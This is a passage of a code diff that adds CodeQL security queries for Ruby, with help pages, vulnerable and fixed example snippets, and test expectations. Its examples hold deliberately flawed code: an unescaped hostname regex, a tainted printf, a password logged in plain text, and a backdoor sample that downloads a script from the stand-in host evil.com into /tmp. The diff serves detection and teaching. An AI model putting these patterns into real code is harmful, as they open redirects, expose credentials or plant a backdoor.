+  term.(RegExpCharEscape).getValue() = "."
+  or
+  exists(RegExpCharacterClass cls |
+    term = cls and
+    not cls.isInverted() and
+    cls.getNumChild() = 1 and
+    cls.getAChild().(RegExpConstant).getValue() = "."
+  )
+}
+
+/** Holds if `term` is a wildcard `.` or an actual `.` character. */
+predicate isDotLike(RegExpTerm term) {
+  term instanceof RegExpDot
+  or
+  isDotConstant(term)
+}
+
+/** Holds if `term` will only ever be matched against the beginning of the input. */
+predicate matchesBeginningOfString(RegExpTerm term) {
+  term.isRootTerm()
+  or
+  exists(RegExpTerm parent | matchesBeginningOfString(parent) |
+    term = parent.(RegExpSequence).getChild(0)
+    or
+    parent.(RegExpSequence).getChild(0) instanceof RegExpCaret and
+    term = parent.(RegExpSequence).getChild(1)
+    or
+    term = parent.(RegExpAlt).getAChild()
+    or
+    term = parent.(RegExpGroup).getAChild()
+  )
+}
+
+/**
+ * Holds if the given sequence contains a top-level domain preceded by a dot, such as `.com`,
+ * excluding cases where this is at the very beginning of the regexp.
+ *
+ * `i` is bound to the index of the constant child of `seq` that holds the top-level domain.
+ */
+predicate hasTopLevelDomainEnding(RegExpSequence seq, int i) {
+  seq.getChild(i)
+      .(RegExpConstant)
+      .getValue()
+      .regexpMatch("(?i)" + RegExpPatterns::getACommonTld() + "(:\\d+)?([/?#].*)?") and
+  isDotLike(seq.getChild(i - 1)) and
+  not (i = 1 and matchesBeginningOfString(seq))
+}
+
+/**
+ * Holds if the given regular expression term contains a top-level domain preceded by a dot,
+ * such as `.com`.
+ */
+predicate hasTopLevelDomainEnding(RegExpSequence seq) { hasTopLevelDomainEnding(seq, _) }
+
+/**
+ * Holds if `term` will always match a hostname, that is, all disjunctions contain
+ * a hostname pattern that isn't inside a quantifier.
+ */
+predicate alwaysMatchesHostname(RegExpTerm term) {
+  hasTopLevelDomainEnding(term, _)
+  or
+  // `localhost` is considered a hostname pattern, but has no TLD
+  term.(RegExpConstant).getValue().regexpMatch("\\blocalhost\\b")
+  or
+  not term instanceof RegExpAlt and
+  not term instanceof RegExpQuantifier and
+  alwaysMatchesHostname(term.getAChild())
+  or
+  alwaysMatchesHostnameAlt(term)
+}
+
+/** Holds if every child of `alt` contains a hostname pattern. */
+predicate alwaysMatchesHostnameAlt(RegExpAlt alt) {
+  alwaysMatchesHostnameAlt(alt, alt.getNumChild() - 1)
+}
+
+/**
+ * Holds if each child of `alt` at index `0` through `i` contains a hostname pattern.
+ *
+ * This is used instead of `forall` to avoid materializing the set of alternatives
+ * that don't contain hostnames, which is much larger.
+ */
+predicate alwaysMatchesHostnameAlt(RegExpAlt alt, int i) {
+  alwaysMatchesHostname(alt.getChild(0)) and i = 0
+  or
+  alwaysMatchesHostnameAlt(alt, i - 1) and
+  alwaysMatchesHostname(alt.getChild(i))
+}
+
+/**
+ * Holds if `term` occurs inside a quantifier or alternative (and thus
+ * can not be expected to correspond to a unique match), or as part of
+ * a lookaround assertion (which are rarely used for capture groups).
+ */
+predicate isInsideChoiceOrSubPattern(RegExpTerm term) {
+  exists(RegExpParent parent | parent = term.getParent() |
+    parent instanceof RegExpAlt
+    or
+    parent instanceof RegExpQuantifier
+    or
+    parent instanceof RegExpSubPattern
+    or
+    isInsideChoiceOrSubPattern(parent)
+  )
+}
+
+/**
+ * Holds if `group` is likely to be used as a capture group.
+ */
+predicate isLikelyCaptureGroup(RegExpGroup group) {
+  group.isCapture() and
+  not isInsideChoiceOrSubPattern(group)
+}
+
+/**
+ * Holds if `seq` contains two consecutive dots `..` or escaped dots.
+ *
+ * At least one of these dots is not intended to be a subdomain separator,
+ * so we avoid flagging the pattern in this case.
+ */
+predicate hasConsecutiveDots(RegExpSequence seq) {
+  exists(int i |
+    isDotLike(seq.getChild(i)) and
+    isDotLike(seq.getChild(i + 1))
+  )
+}
+
+predicate isIncompleteHostNameRegExpPattern(RegExpTerm regexp, RegExpSequence seq, string msg) {
+  seq = regexp.getAChild*() and
+  exists(RegExpDot unescapedDot, int i, string hostname |
+    hasTopLevelDomainEnding(seq, i) and
+    not isConstantInvalidInsideOrigin(seq.getChild([0 .. i - 1]).getAChild*()) and
+    not isLikelyCaptureGroup(seq.getChild([i .. seq.getNumChild() - 1]).getAChild*()) and
+    unescapedDot = seq.getChild([0 .. i - 1]).getAChild*() and
+    unescapedDot != seq.getChild(i - 1) and // Should not be the '.' immediately before the TLD
+    not hasConsecutiveDots(unescapedDot.getParent()) and
+    hostname =
+      seq.getChild(i - 2).getRawValue() + seq.getChild(i - 1).getRawValue() +
+        seq.getChild(i).getRawValue()
+  |
+    if unescapedDot.getParent() instanceof RegExpQuantifier
+    then
+      // `.*\.example.com` can match `evil.com/?x=.example.com`
+      //
+      // This problem only occurs when the pattern is applied against a full URL, not just a hostname/origin.
+      // We therefore check if the pattern includes a suffix after the TLD, such as `.*\.example.com/`.
+      // Note that a post-anchored pattern (`.*\.example.com$`) will usually fail to match a full URL,
+      // and patterns with neither a suffix nor an anchor fall under the purview of MissingRegExpAnchor.
+      seq.getChild(0) instanceof RegExpCaret and
+      not seq.getAChild() instanceof RegExpDollar and
+      seq.getChild([i .. i + 1]).(RegExpConstant).getValue().regexpMatch(".*[/?#].*") and
+      msg =
+        "has an unrestricted wildcard '" + unescapedDot.getParent().(RegExpQuantifier).getRawValue()
+          + "' which may cause '" + hostname +
+          "' to be matched anywhere in the URL, outside the hostname."
+    else
+      msg =
+        "has an unescaped '.' before '" + hostname +
+          "', so it might match more hosts than expected."
+  )
+}
+
+predicate incompleteHostnameRegExp(
+  RegExpSequence hostSequence, string message, DataFlow::Node aux, string label
+) {
+  exists(RegExpPatternSource re, RegExpTerm regexp, string msg, string kind |
+    regexp = re.getRegExpTerm() and
+    isIncompleteHostNameRegExpPattern(regexp, hostSequence, msg) and
+    (
+      if re.getAParse() != re
+      then (
+        kind = "string, which is used as a regular expression $@," and
+        aux = re.getAParse()
+      ) else (
+        kind = "regular expression" and aux = re
+      )
+    )
+  |
+    message = "This " + kind + " " + msg and label = "here"
+  )
+}
--- a/ruby/ql/src/queries/security/cwe-020/HostnameRegexpSpecific.qll
+++ b/ruby/ql/src/queries/security/cwe-020/HostnameRegexpSpecific.qll
@@ -0,0 +1,2 @@
+import codeql.ruby.security.performance.RegExpTreeView
+import codeql.ruby.DataFlow
--- a/ruby/ql/src/queries/security/cwe-020/IncompleteHostnameRegExp.qhelp
+++ b/ruby/ql/src/queries/security/cwe-020/IncompleteHostnameRegExp.qhelp
@@ -0,0 +1,72 @@
+<!DOCTYPE qhelp PUBLIC
+"-//Semmle//qhelp//EN"
+"qhelp.dtd">
+<qhelp>
+
+	<overview>
+		<p>
+
+			Sanitizing untrusted URLs is an important technique for
+			preventing attacks such as request forgeries and malicious
+			redirections. Often, this is done by checking that the host of a URL
+			is in a set of allowed hosts.
+
+		</p>
+
+		<p>
+
+			If a regular expression implements such a check, it is
+			easy to accidentally make the check too permissive by not escaping the
+			<code>.</code> meta-characters appropriately.
+
+			Even if the check is not used in a security-critical
+			context, the incomplete check may still cause undesirable behaviors
+			when it accidentally succeeds.
+
+		</p>
+	</overview>
+
+	<recommendation>
+		<p>
+
+			Escape all meta-characters appropriately when constructing
+			regular expressions for security checks, and pay special attention to the
+			<code>.</code> meta-character.
+
+		</p>
+	</recommendation>
+
+	<example>
+
+		<p>
+
+			The following example code checks that a URL redirection
+			will reach the <code>example.com</code> domain, or one of its
+			subdomains.
+
+		</p>
+
+		<sample src="examples/IncompleteHostnameRegExp.rb"/>
+
+		<p>
+
+			The check is however easy to bypass because the unescaped
+			<code>.</code> allows for any character before
+			<code>example.com</code>, effectively allowing the redirect to go to
+			an attacker-controlled domain such as <code>wwwXexample.com</code>.
+
+		</p>
+		<p>
+
+			Address this vulnerability by escaping <code>.</code>
+			appropriately: <code>regex = /^((www|beta)\.)?example\.com/</code>.
+
+		</p>
+
+	</example>
+
+	<references>
+		<li>OWASP: <a href="https://www.owasp.org/index.php/Server_Side_Request_Forgery">SSRF</a></li>
+		<li>OWASP: <a href="https://cheatsheetseries.owasp.org/cheatsheets/Unvalidated_Redirects_and_Forwards_Cheat_Sheet.html">Unvalidated Redirects and Forwards Cheat Sheet</a>.</li>
+	</references>
+</qhelp>
--- a/ruby/ql/src/queries/security/cwe-020/IncompleteHostnameRegExp.ql
+++ b/ruby/ql/src/queries/security/cwe-020/IncompleteHostnameRegExp.ql
@@ -0,0 +1,16 @@
+/**
+ * @name Incomplete regular expression for hostnames
+ * @description Matching a URL or hostname against a regular expression that contains an unescaped dot as part of the hostname might match more hostnames than expected.
+ * @kind problem
+ * @problem.severity warning
+ * @security-severity 7.8
+ * @precision high
+ * @id rb/incomplete-hostname-regexp
+ * @tags correctness
+ *       security
+ *       external/cwe/cwe-020
+ */
+
+import HostnameRegexpShared
+
+query predicate problems = incompleteHostnameRegExp/4;
--- a/ruby/ql/src/queries/security/cwe-020/examples/IncompleteHostnameRegExp.rb
+++ b/ruby/ql/src/queries/security/cwe-020/examples/IncompleteHostnameRegExp.rb
@@ -0,0 +1,13 @@
+class AppController < ApplicationController
+
+    def index
+        url = params[:url]
+        host = URI(url).host
+        # BAD: the host of `url` may be controlled by an attacker
+        regex = /^((www|beta).)?example.com/
+        if host.match(regex)
+            redirect_to url
+        end
+    end
+
+end
--- a/ruby/ql/src/queries/security/cwe-134/TaintedFormatString.qhelp
+++ b/ruby/ql/src/queries/security/cwe-134/TaintedFormatString.qhelp
@@ -0,0 +1,50 @@
+<!DOCTYPE qhelp PUBLIC
+  "-//Semmle//qhelp//EN"
+  "qhelp.dtd">
+<qhelp>
+
+<overview>
+<p>
+Methods like <code>Kernel.printf</code> accept a format string that is used to format
+the remaining arguments by providing inline format specifiers. If the format string
+contains unsanitized input from an untrusted source, then that string may contain
+unexpected format specifiers that cause garbled output or throw an exception.
+</p>
+</overview>
+
+<recommendation>
+<p>
+Either sanitize the input before including it in the format string, or use a
+<code>%s</code> specifier in the format string, and pass the untrusted data as corresponding
+argument.
+</p>
+</recommendation>
+
+<example>
+<p>
+The following program snippet logs information about an unauthorized access attempt. The
+log message includes the user name, and the user's IP address is passed as an additional
+argument to <code>Kernel.printf</code> to be appended to the message:
+</p>
+<sample src="examples/tainted_format_string_bad.rb"/>
+<p>
+However, if a malicious user provides a format specifier such as <code>%s</code>
+as their user name, <code>Kernel.printf</code> will throw an exception as there
+are too few arguments to satisfy the format. This can result in denial of
+service or leaking of internal information to the attacker via a stack trace.
+</p>
+<p>
+Instead, the user name should be included using the <code>%s</code> specifier:
+</p>
+<sample src="examples/tainted_format_string_good.rb"/>
+
+<p>
+Alternatively, string interpolation should be used exclusively:
+</p>
+<sample src="examples/tainted_format_string_interpolation.rb"/>
+</example>
+
+<references>
+<li>Ruby documentation for <a href="https://docs.ruby-lang.org/en/3.1/Kernel.html#method-i-sprintf">format strings</a>.</li>
+</references>
+</qhelp>
--- a/ruby/ql/src/queries/security/cwe-134/TaintedFormatString.ql
+++ b/ruby/ql/src/queries/security/cwe-134/TaintedFormatString.ql
@@ -0,0 +1,21 @@
+/**
+ * @name Use of externally-controlled format string
+ * @description Using external input in format strings can lead to garbled output.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 7.3
+ * @precision high
+ * @id rb/tainted-format-string
+ * @tags security
+ *       external/cwe/cwe-134
+ */
+
+import ruby
+import codeql.ruby.DataFlow
+import codeql.ruby.security.TaintedFormatStringQuery
+import DataFlow::PathGraph
+
+from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink
+where cfg.hasFlowPath(source, sink)
+select sink.getNode(), source, sink, "$@ flows here and is used in a format string.",
+  source.getNode(), "User-provided value"
--- a/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_bad.rb
+++ b/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_bad.rb
@@ -0,0 +1,5 @@
+class UsersController < ActionController::Base
+  def index
+    printf("Unauthorised access attempt by #{params[:user]}: %s", request.ip)
+  end
+end
--- a/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_good.rb
+++ b/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_good.rb
@@ -0,0 +1,5 @@
+class UsersController < ActionController::Base
+  def index
+    printf("Unauthorised access attempt by %s: %s", params[:user], request.ip)
+  end
+end
--- a/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_interpolation.rb
+++ b/ruby/ql/src/queries/security/cwe-134/examples/tainted_format_string_interpolation.rb
@@ -0,0 +1,5 @@
+class UsersController < ActionController::Base
+  def index
+    puts "Unauthorised access attempt by #{params[:user]}: #{request.ip}"
+  end
+end
--- a/ruby/ql/src/queries/security/cwe-312/CleartextStorage.qhelp
+++ b/ruby/ql/src/queries/security/cwe-312/CleartextStorage.qhelp
@@ -0,0 +1,51 @@
+<!DOCTYPE qhelp PUBLIC
+  "-//Semmle//qhelp//EN"
+  "qhelp.dtd">
+<qhelp>
+
+<overview>
+<p>
+Sensitive information that is stored unencrypted is accessible to an attacker
+who gains access to the storage.
+</p>
+</overview>
+
+<recommendation>
+<p>
+Ensure that sensitive information is always encrypted before being stored.
+</p>
+<p>
+In general, decrypt sensitive information only at the point where it is
+necessary for it to be used in cleartext.
+</p>
+
+<p>
+
+Be aware that external processes often store the <code>standard
+out</code> and <code>standard error</code> streams of the application,
+causing logged sensitive information to be stored as well.
+
+</p>
+
+</recommendation>
+
+<example>
+<p>
+The following example code stores user credentials (in this case, their password)
+to disk in plain text:
+</p>
+<sample src="examples/CleartextStorageBad.rb"/>
+<p>
+Instead, the credentials should be masked or redacted before storing:
+</p>
+<sample src="examples/CleartextStorageGood.rb"/>
+</example>
+
+
+<references>
+
+<li>M. Dowd, J. McDonald and J. Schuh, <i>The Art of Software Security Assessment</i>, 1st Edition, Chapter 2 - 'Common Vulnerabilities of Encryption', p. 43. Addison Wesley, 2006.</li>
+<li>M. Howard and D. LeBlanc, <i>Writing Secure Code</i>, 2nd Edition, Chapter 9 - 'Protecting Secret Data', p. 299. Microsoft, 2002.</li>
+
+</references>
+</qhelp>
--- a/ruby/ql/src/queries/security/cwe-312/CleartextStorage.ql
+++ b/ruby/ql/src/queries/security/cwe-312/CleartextStorage.ql
@@ -0,0 +1,25 @@
+/**
+ * @name Clear-text storage of sensitive information
+ * @description Storing sensitive information without encryption or hashing can
+ *              expose it to an attacker.
+ * @kind path-problem
+ * @problem.severity error
+ * @security-severity 7.5
+ * @precision high
+ * @id rb/clear-text-storage-sensitive-data
+ * @tags security
+ *       external/cwe/cwe-312
+ *       external/cwe/cwe-359
+ *       external/cwe/cwe-532
+ */
+
+import ruby
+import codeql.ruby.security.CleartextStorageQuery
+import codeql.ruby.security.CleartextStorageCustomizations::CleartextStorage
+import codeql.ruby.DataFlow
+import DataFlow::PathGraph
+
+from Configuration config, DataFlow::PathNode source, DataFlow::PathNode sink
+where config.hasFlowPath(source, sink)
+select source.getNode(), source, sink, "Sensitive data returned by $@ is stored $@.",
+  source.getNode(), source.getNode().(Source).describe(), sink.getNode(), "here"
--- a/ruby/ql/src/queries/security/cwe-312/examples/CleartextStorageBad.rb
+++ b/ruby/ql/src/queries/security/cwe-312/examples/CleartextStorageBad.rb
@@ -0,0 +1,7 @@
+class UserSession
+  def login(username, password)
+    # ...
+    logfile = File.open("login_attempts.log", "a")
+    logfile.puts "login with password: #{password}"
+  end
+end
--- a/ruby/ql/src/queries/security/cwe-312/examples/CleartextStorageGood.rb
+++ b/ruby/ql/src/queries/security/cwe-312/examples/CleartextStorageGood.rb
@@ -0,0 +1,8 @@
+class UserSession
+  def login(username, password)
+    # ...
+    password_escaped = password.sub(/.*/, "[redacted]")
+    logfile = File.open("login_attempts.log", "a")
+    logfile.puts "login with password: #{password_escaped}"
+  end
+end
--- a/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp
+++ b/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.qhelp
@@ -0,0 +1,43 @@
+<!DOCTYPE qhelp PUBLIC
+"-//Semmle//qhelp//EN"
+"qhelp.dtd">
+<qhelp>
+
+<overview>
+  <p>
+    Storing user-controlled data on the local file system without
+    further validation allows arbitrary file upload, and may be
+    an indication of malicious backdoor code that has been
+    implanted into an otherwise trusted code base.
+  </p>
+</overview>
+
+<recommendation>
+  <p>
+    Examine the highlighted code closely to ensure that it is
+    behaving as intended.
+  </p>
+</recommendation>
+
+<example>
+  <p>
+    The following example shows backdoor code that downloads data
+    from the URL <code>https://evil.com/script</code>, and stores
+    it in the local file <code>/tmp/script</code>.
+  </p>
+
+  <sample src="examples/http_to_file_access.rb"/>
+
+  <p>
+    Other parts of the program might then assume that since
+    <code>/tmp/script</code> is a local file its contents can be
+    trusted, while in fact they are obtained from an untrusted
+    remote source.
+  </p>
+</example>
+
+<references>
+  <li>OWASP: <a href="https://www.owasp.org/index.php/Trojan_Horse">Trojan Horse</a>.</li>
+  <li>OWASP: <a href="https://www.owasp.org/index.php/Unrestricted_File_Upload">Unrestricted File Upload</a>.</li>
+</references>
+</qhelp>
--- a/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.ql
+++ b/ruby/ql/src/queries/security/cwe-912/HttpToFileAccess.ql
@@ -0,0 +1,21 @@
+/**
+ * @name Network data written to file
+ * @description Writing network data directly to the file system allows arbitrary file upload and might indicate a backdoor.
+ * @kind path-problem
+ * @problem.severity warning
+ * @security-severity 6.3
+ * @precision medium
+ * @id rb/http-to-file-access
+ * @tags security
+ *       external/cwe/cwe-912
+ *       external/cwe/cwe-434
+ */
+
+import ruby
+import codeql.ruby.DataFlow
+import codeql.ruby.DataFlow::DataFlow::PathGraph
+import codeql.ruby.security.HttpToFileAccessQuery
+
+from Configuration cfg, DataFlow::PathNode source, DataFlow::PathNode sink
+where cfg.hasFlowPath(source, sink)
+select sink.getNode(), source, sink, "$@ flows to file system", source.getNode(), "Untrusted data"
--- a/ruby/ql/src/queries/security/cwe-912/examples/http_to_file_access.rb
+++ b/ruby/ql/src/queries/security/cwe-912/examples/http_to_file_access.rb
@@ -0,0 +1,5 @@
+require "net/http"
+
+resp = Net::HTTP.new("evil.com").get("/script").body
+file = File.open("/tmp/script", "w")
+file.write(resp)
--- a/ruby/ql/test/library-tests/dataflow/api-graphs/test1.rb
+++ b/ruby/ql/test/library-tests/dataflow/api-graphs/test1.rb
@@ -62,3 +62,9 @@ M1::C1.new.m #$ use=getMember("M1").getMember("C1").getMethod("new").getReturn()
 M2::C3.new.m #$ use=getMember("M2").getMember("C3").getMethod("new").getReturn().getMethod("m").getReturn()

 Foo.foo(a,b:c) #$ use=getMember("Foo").getMethod("foo").getReturn() def=getMember("Foo").getMethod("foo").getParameter(0) def=getMember("Foo").getMethod("foo").getKeywordParameter("b")
+
+def userDefinedFunction(x, y)
+    x.noApiGraph(y)
+    x.customEntryPointCall(y) #$ call=CustomEntryPointCall use=CustomEntryPointCall.getReturn() rhs=CustomEntryPointCall.getParameter(0)
+    x.customEntryPointUse(y) #$ use=CustomEntryPointUse
+end
--- a/ruby/ql/test/library-tests/dataflow/api-graphs/use.ql
+++ b/ruby/ql/test/library-tests/dataflow/api-graphs/use.ql
@@ -3,6 +3,20 @@ import codeql.ruby.DataFlow
 import TestUtilities.InlineExpectationsTest
 import codeql.ruby.ApiGraphs

+class CustomEntryPointCall extends API::EntryPoint {
+  CustomEntryPointCall() { this = "CustomEntryPointCall" }
+
+  override DataFlow::CallNode getACall() { result.getMethodName() = "customEntryPointCall" }
+}
+
+class CustomEntryPointUse extends API::EntryPoint {
+  CustomEntryPointUse() { this = "CustomEntryPointUse" }
+
+  override DataFlow::LocalSourceNode getAUse() {
+    result.(DataFlow::CallNode).getMethodName() = "customEntryPointUse"
+  }
+}
+
 class ApiUseTest extends InlineExpectationsTest {
  ApiUseTest() { this = "ApiUseTest" }

@@ -16,6 +30,9 @@ class ApiUseTest extends InlineExpectationsTest {
      or
      tag = "def" and
      n = a.getARhs()
+      or
+      tag = "call" and
+      n = a.(API::MethodAccessNode).getCallNode()
    )
  }

--- a/ruby/ql/test/library-tests/dataflow/summaries/Summaries.expected
+++ b/ruby/ql/test/library-tests/dataflow/summaries/Summaries.expected
@@ -2,6 +2,14 @@ edges
 | summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:2:6:2:12 | tainted |
 | summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:4:24:4:30 | tainted :  |
 | summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:16:36:16:42 | tainted :  |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:20:25:20:31 | tainted :  |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:26:31:26:37 | tainted :  |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:30:24:30:30 | tainted :  |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:31:27:31:33 | tainted :  |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:34:16:34:22 | tainted |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:35:16:35:22 | tainted |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:36:21:36:27 | tainted |
+| summaries.rb:1:11:1:26 | call to identity :  | summaries.rb:37:36:37:42 | tainted |
 | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:1:11:1:26 | call to identity :  |
 | summaries.rb:4:12:7:3 | call to apply_block :  | summaries.rb:9:6:9:13 | tainted2 |
 | summaries.rb:4:24:4:30 | tainted :  | summaries.rb:4:12:7:3 | call to apply_block :  |
@@ -11,6 +19,19 @@ edges
 | summaries.rb:16:12:16:43 | call to apply_lambda :  | summaries.rb:18:6:18:13 | tainted3 |
 | summaries.rb:16:36:16:42 | tainted :  | summaries.rb:11:17:11:17 | x :  |
 | summaries.rb:16:36:16:42 | tainted :  | summaries.rb:16:12:16:43 | call to apply_lambda :  |
+| summaries.rb:20:12:20:32 | call to firstArg :  | summaries.rb:21:6:21:13 | tainted4 |
+| summaries.rb:20:25:20:31 | tainted :  | summaries.rb:20:12:20:32 | call to firstArg :  |
+| summaries.rb:26:12:26:38 | call to secondArg :  | summaries.rb:27:6:27:13 | tainted5 |
+| summaries.rb:26:31:26:37 | tainted :  | summaries.rb:26:12:26:38 | call to secondArg :  |
+| summaries.rb:30:24:30:30 | tainted :  | summaries.rb:30:6:30:42 | call to onlyWithBlock |
+| summaries.rb:31:27:31:33 | tainted :  | summaries.rb:31:6:31:34 | call to onlyWithoutBlock |
+| summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:41:24:41:24 | t :  |
+| summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:42:24:42:24 | t :  |
+| summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:44:8:44:8 | t :  |
+| summaries.rb:41:24:41:24 | t :  | summaries.rb:41:8:41:25 | call to matchedByName |
+| summaries.rb:42:24:42:24 | t :  | summaries.rb:42:8:42:25 | call to matchedByName |
+| summaries.rb:44:8:44:8 | t :  | summaries.rb:44:8:44:27 | call to matchedByNameRcv |
+| summaries.rb:48:24:48:30 | "taint" :  | summaries.rb:48:8:48:31 | call to preserveTaint |
 nodes
 | summaries.rb:1:11:1:26 | call to identity :  | semmle.label | call to identity :  |
 | summaries.rb:1:20:1:26 | "taint" :  | semmle.label | "taint" :  |
@@ -25,6 +46,29 @@ nodes
 | summaries.rb:16:12:16:43 | call to apply_lambda :  | semmle.label | call to apply_lambda :  |
 | summaries.rb:16:36:16:42 | tainted :  | semmle.label | tainted :  |
 | summaries.rb:18:6:18:13 | tainted3 | semmle.label | tainted3 |
+| summaries.rb:20:12:20:32 | call to firstArg :  | semmle.label | call to firstArg :  |
+| summaries.rb:20:25:20:31 | tainted :  | semmle.label | tainted :  |
+| summaries.rb:21:6:21:13 | tainted4 | semmle.label | tainted4 |
+| summaries.rb:26:12:26:38 | call to secondArg :  | semmle.label | call to secondArg :  |
+| summaries.rb:26:31:26:37 | tainted :  | semmle.label | tainted :  |
+| summaries.rb:27:6:27:13 | tainted5 | semmle.label | tainted5 |
+| summaries.rb:30:6:30:42 | call to onlyWithBlock | semmle.label | call to onlyWithBlock |
+| summaries.rb:30:24:30:30 | tainted :  | semmle.label | tainted :  |
+| summaries.rb:31:6:31:34 | call to onlyWithoutBlock | semmle.label | call to onlyWithoutBlock |
+| summaries.rb:31:27:31:33 | tainted :  | semmle.label | tainted :  |
+| summaries.rb:34:16:34:22 | tainted | semmle.label | tainted |
+| summaries.rb:35:16:35:22 | tainted | semmle.label | tainted |
+| summaries.rb:36:21:36:27 | tainted | semmle.label | tainted |
+| summaries.rb:37:36:37:42 | tainted | semmle.label | tainted |
+| summaries.rb:40:7:40:13 | "taint" :  | semmle.label | "taint" :  |
+| summaries.rb:41:8:41:25 | call to matchedByName | semmle.label | call to matchedByName |
+| summaries.rb:41:24:41:24 | t :  | semmle.label | t :  |
+| summaries.rb:42:8:42:25 | call to matchedByName | semmle.label | call to matchedByName |
+| summaries.rb:42:24:42:24 | t :  | semmle.label | t :  |
+| summaries.rb:44:8:44:8 | t :  | semmle.label | t :  |
+| summaries.rb:44:8:44:27 | call to matchedByNameRcv | semmle.label | call to matchedByNameRcv |
+| summaries.rb:48:8:48:31 | call to preserveTaint | semmle.label | call to preserveTaint |
+| summaries.rb:48:24:48:30 | "taint" :  | semmle.label | "taint" :  |
 subpaths
 invalidSpecComponent
 invalidOutputSpecComponent
@@ -34,3 +78,23 @@ invalidOutputSpecComponent
 | summaries.rb:9:6:9:13 | tainted2 | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:9:6:9:13 | tainted2 | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
 | summaries.rb:12:8:12:8 | x | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:12:8:12:8 | x | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
 | summaries.rb:18:6:18:13 | tainted3 | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:18:6:18:13 | tainted3 | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:21:6:21:13 | tainted4 | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:21:6:21:13 | tainted4 | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:27:6:27:13 | tainted5 | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:27:6:27:13 | tainted5 | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:30:6:30:42 | call to onlyWithBlock | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:30:6:30:42 | call to onlyWithBlock | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:31:6:31:34 | call to onlyWithoutBlock | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:31:6:31:34 | call to onlyWithoutBlock | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:34:16:34:22 | tainted | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:34:16:34:22 | tainted | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:35:16:35:22 | tainted | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:35:16:35:22 | tainted | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:36:21:36:27 | tainted | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:36:21:36:27 | tainted | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:37:36:37:42 | tainted | summaries.rb:1:20:1:26 | "taint" :  | summaries.rb:37:36:37:42 | tainted | $@ | summaries.rb:1:20:1:26 | "taint" :  | "taint" :  |
+| summaries.rb:41:8:41:25 | call to matchedByName | summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:41:8:41:25 | call to matchedByName | $@ | summaries.rb:40:7:40:13 | "taint" :  | "taint" :  |
+| summaries.rb:42:8:42:25 | call to matchedByName | summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:42:8:42:25 | call to matchedByName | $@ | summaries.rb:40:7:40:13 | "taint" :  | "taint" :  |
+| summaries.rb:44:8:44:27 | call to matchedByNameRcv | summaries.rb:40:7:40:13 | "taint" :  | summaries.rb:44:8:44:27 | call to matchedByNameRcv | $@ | summaries.rb:40:7:40:13 | "taint" :  | "taint" :  |
+| summaries.rb:48:8:48:31 | call to preserveTaint | summaries.rb:48:24:48:30 | "taint" :  | summaries.rb:48:8:48:31 | call to preserveTaint | $@ | summaries.rb:48:24:48:30 | "taint" :  | "taint" :  |
+warning
+| CSV type row should have 5 columns but has 2: test;TooFewColumns |
+| CSV type row should have 5 columns but has 8: test;TooManyColumns;;;Member[Foo].Instance;too;many;columns |
+| Invalid argument '0-1' in token 'Argument[0-1]' in access path: Method[foo].Argument[0-1] |
+| Invalid argument '*' in token 'Argument[*]' in access path: Method[foo].Argument[*] |
+| Invalid token 'Argument' is missing its arguments, in access path: Method[foo].Argument |
+| Invalid token 'Member' is missing its arguments, in access path: Method[foo].Member |
+| Invalid token name 'Arg' in access path: Method[foo].Arg[0] |
--- a/ruby/ql/test/library-tests/dataflow/summaries/Summaries.ql
+++ b/ruby/ql/test/library-tests/dataflow/summaries/Summaries.ql
@@ -8,12 +8,15 @@ import DataFlow::PathGraph
 import codeql.ruby.TaintTracking
 import codeql.ruby.dataflow.internal.FlowSummaryImpl
 import codeql.ruby.dataflow.internal.AccessPathSyntax
+import codeql.ruby.frameworks.data.ModelsAsData

 query predicate invalidSpecComponent(SummarizedCallable sc, string s, string c) {
  (sc.propagatesFlowExt(s, _, _) or sc.propagatesFlowExt(_, s, _)) and
  Private::External::invalidSpecComponent(s, c)
 }

+/**
